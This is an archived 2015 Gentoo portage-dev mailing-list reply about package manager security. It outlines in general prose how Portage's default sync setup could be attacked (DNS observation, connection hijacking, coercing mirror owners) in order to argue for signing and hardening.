From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: from lists.gentoo.org (pigeon.gentoo.org [208.92.234.80]) by finch.gentoo.org (Postfix) with ESMTP id AACE5138CA3 for ; Fri, 6 Mar 2015 13:53:37 +0000 (UTC) Received: from pigeon.gentoo.org (localhost [127.0.0.1]) by pigeon.gentoo.org (Postfix) with SMTP id E7B1FE0895; Fri, 6 Mar 2015 13:53:34 +0000 (UTC) Received: from mail-lb0-f182.google.com (mail-lb0-f182.google.com [209.85.217.182]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by pigeon.gentoo.org (Postfix) with ESMTPS id 3CC7DE088D for ; Fri, 6 Mar 2015 13:53:33 +0000 (UTC) Received: by lbiz12 with SMTP id z12so29780221lbi.12 for ; Fri, 06 Mar 2015 05:53:32 -0800 (PST) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to:content-type:content-transfer-encoding; bh=PkSxSg9yQj0XVhqC4vfCMCcmJ95/al/d0HTuuxJ/Y5U=; b=KixJ2ClkPq6KjrzB11wkEgdPFKn86re+IfuLUiBhIjgr82BkHX5AUD7lsqOcqR5TtO t0GP50iUxZxj3Uh0BFPKSQ60cNuPr9XweBcXZaJBA/r1qCgG8GEPEeJCvzF7sb9FJ9ta ae/RNYQm63M66ZzePacPeKWkfnohpRlEdMukBE21jmQNXlz047jU8DFg0vZLphCY+fSZ CFsj/IXAh3/s0+fASFRyN9y9g1iITQawuHkinY9i2j9ON72js/PV34eTZflHN4zhtZJC XxlicYKD0/0dVy0MMvk5AUn38NPwlt9H84dVbQPKQvLF06SS1EWQ/4wPO+SOnbtluh03 OWrg== X-Gm-Message-State: ALoCoQlKTVDuXoGLvd+GwFTgel6MEfX0dhIumeg3Db6L5NDNL2mV+psIQyj6yAIhjSe6+t130jP/ X-Received: by 10.152.4.136 with SMTP id k8mr12853472lak.103.1425650012281; Fri, 06 Mar 2015 05:53:32 -0800 (PST) Precedence: bulk List-Post: List-Help: List-Unsubscribe: List-Subscribe: List-Id: Gentoo Linux mail X-BeenThere: gentoo-portage-dev@lists.gentoo.org Reply-to: gentoo-portage-dev@lists.gentoo.org MIME-Version: 1.0 Received: by 10.25.150.19 with HTTP; Fri, 6 Mar 2015 05:53:02 -0800 (PST) In-Reply-To: <54F8FB24.5060906@gentoo.org> References: <54F86D04.3060804@whonix.org> <54F87698.5010104@gentoo.org> <54F8AB17.6050508@whonix.org> <54F8FB24.5060906@gentoo.org> From: Mark Kubacki Date: Fri, 6 Mar 2015 14:53:02 +0100 Message-ID: Subject: Re: [gentoo-portage-dev] Security and Comparison of Portage with other Package Managers To: gentoo-portage-dev@lists.gentoo.org Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Archives-Salt: bb28bf05-b99f-4a07-94bb-0f82e4cfe34f X-Archives-Hash: 73f2f348e4fd61e03696db110225b6ac 2015-03-06 1:56 GMT+01:00 Rick "Zero_Chaos" Farina : > > tl;dr webrsync-gpg is a built in feature of the package manager which > OPTIONALLY adds a significant amount of security against the attacks > described on your website. This is not currently the default setting, > however, it is described in many hardening guides for gentoo and widely > used among the security conscious. Without numbers backing that up this is speculation. Given the default settings (without webrsync-gpg)=E2=80=A6: > (8) Wrong software installation. Observe the DNS requests for the rsync- or webrsync mirror. They're not encrypted and give you a nice heads-up. A. (data in transit) It's almost never HTTPS and/or without authentication, so you can easily proceed to hijacking the connection. - Primed that way (DNS) insert a new rule into a router (or nameserver) along the path or within the DC to redirect the transaction. (See "quantum insert".) B. (data at rest) Bribe or coerce the owner of the (portage tree) mirror. Manifests and ebuilds are not centrally signed and there is no authoritative "signing transparency"/record (see "certificate transparency"). --=20 Mark